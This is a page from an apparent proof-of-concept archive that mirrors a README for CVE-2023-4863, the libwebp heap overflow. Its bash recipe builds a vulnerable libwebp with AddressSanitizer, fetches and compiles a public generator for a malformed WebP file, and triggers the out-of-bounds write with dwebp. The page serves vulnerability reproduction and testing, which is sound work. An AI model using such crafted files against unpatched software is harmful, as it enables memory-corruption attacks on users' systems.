Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2023-4863 PoC — Google Chrome 缓冲区错误漏洞

Source
https://github.com/bbaranoff/CVE-2023-4863
Associated Vulnerability
Title:Google Chrome 缓冲区错误漏洞 (CVE-2023-4863)
Description:Heap buffer overflow in libwebp in Google Chrome prior to 116.0.5845.187 and libwebp 1.3.2 allowed a remote attacker to perform an out of bounds memory write via a crafted HTML page. (Chromium security severity: Critical)
Readme
# CVE-2023-4863
```bash
  # checkout webp
git clone https://chromium.googlesource.com/webm/libwebp/ webp_test
cd webp_test/
  # checkout vulnerable version
git checkout 7ba44f80f3b94fc0138db159afea770ef06532a0
  # enable AddressSanitizer
sed -i 's/^EXTRA_FLAGS=.*/& -fsanitize=address/' makefile.unix
  # build webp
make -f makefile.unix
cd examples/
  # fetch mistymntncop's proof-of-concept code
wget https://raw.githubusercontent.com/mistymntncop/CVE-2023-4863/main/craft.c
  # build and run proof-of-concept
gcc -o craft craft.c
./craft bad.webp
  # test trigger file
./dwebp bad.webp -o test.png
```
File Snapshot

 [4.0K]  /data/pocs/f2e7238768369e32e1d479d9e1109396148ed08f
├── [ 57K]  my.log
├── [ 605]  README.md
├── [4.3M]  video.webm
└── [4.0K]  webp_test

1 directory, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →